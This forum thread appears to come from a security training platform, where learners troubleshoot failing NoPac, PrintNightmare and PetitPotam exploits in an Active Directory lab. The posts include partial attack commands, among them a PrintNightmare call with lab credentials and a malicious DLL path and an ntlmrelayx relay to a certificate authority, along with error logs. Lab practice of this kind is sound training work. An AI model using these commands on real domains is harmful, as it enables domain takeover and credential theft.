Active Directory Enumeration & Attacks: Bleeding Edge Vulnerabilities

Howdy everyone,

I have been trying for hours and hours to gain a shell on the DC01 host. I’ve tried all 3 exploits numerous times, and fail each time. Tried resetting the VM numerous times, and have done everything verbatim how it is presented in the module. Have also tried others suggestions on previous posts for this module, all to no avail. I think there may be a bug or something because I’ve tried everything I can think of.

For the exploit, I am getting the following error:

[] Using TGT from cache
] Impersonating administrator
[*] Requesting S4U2self
[-] [Errno 104] Connection reset by peer
[-] GetST error, error: [Errno 104] Connection reset by peer

And for the PrintNightmare exploit, I get the following error:

└──╼ sudo python3 inlanefreight.local/forend:Klmcargo2@ ‘\\CompData\backupscript.dll’
[*] Connecting to ncacn_np:[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
The NETBIOS connection with the remote host timed out.

And finally, for the exploit, I get the following error:

[-] Sending EfsRpcOpenFileRaw!
Something went wrong, check error status => The NETBIOS connection with the remote host timed out.
Traceback (most recent call last):
File “/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/”, line 984, in non_polling_read
received = self._sock.recv(bytes_left)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File “/opt/PetitPotam/”, line 461, in
File “/opt/PetitPotam/”, line 457, in main
File “/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/”, line 806, in disconnect


And additionally for PetitPotam, on the ntlmrelayx window, I get the following over and over again:

HTTP server returned error code 200, treating as a successful login
] Skipping user ACADEMY-EA-DC01$ since attack was already performed
[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@ controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL

I am to the point of skipping this part of the module as I have seriously tried everything. At first I thought maybe I should be using the 10. IP of the attack host for exploits, but people mentioned in other posts for this that the local IP needs to be the address. That part was extra confusing, as you will see both IP’s pop up when typing ifconfig.

Is anyone else having issue’s similar to this on this module? I really think that it might be bugged or something. As again, I am doing everything verbatim as its presented. And I have tried every single suggestion on all previous posts related to this module. Could it have something to do with the wrong impacket version being installed on the attack host? If so, there is no way to download the suggested Impacket version, as the attack host has no connection to the external internet. :confused:

I am also attempting this lab with petitpotam and everytime, after many resets of lab, the output get stuck and freeze at [*] GOT CERTIFICATE!
uploaded fresh but no luck same error. “host timed out”

./ -d inlanefreight.local -dc-ip

sudo python3 -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

out of ideas.

1 Like

Wow, I can’t even get Petitpotam exploit to get to that point! I’m probably going to open a ticket with support, because I really think the lab is bugged. I’ve re-read the module a few times and reset the machine more times than I can count. None of the 3 exploits have worked for me yet. Gotta be something wrong on the back end because I don’t see anything that I am missing or doing incorrectly.

Howdy Skippy,

I would give it a try again. All the exploits seem to be working for me now. I opened a ticket with support and was informed that there were some issue’s w/ US servers the other day, so that may have been what caused the problems we ran into.

1 Like

Hey Joseph, thanks so much or coming back and letting me know, will test later. \o/

1 Like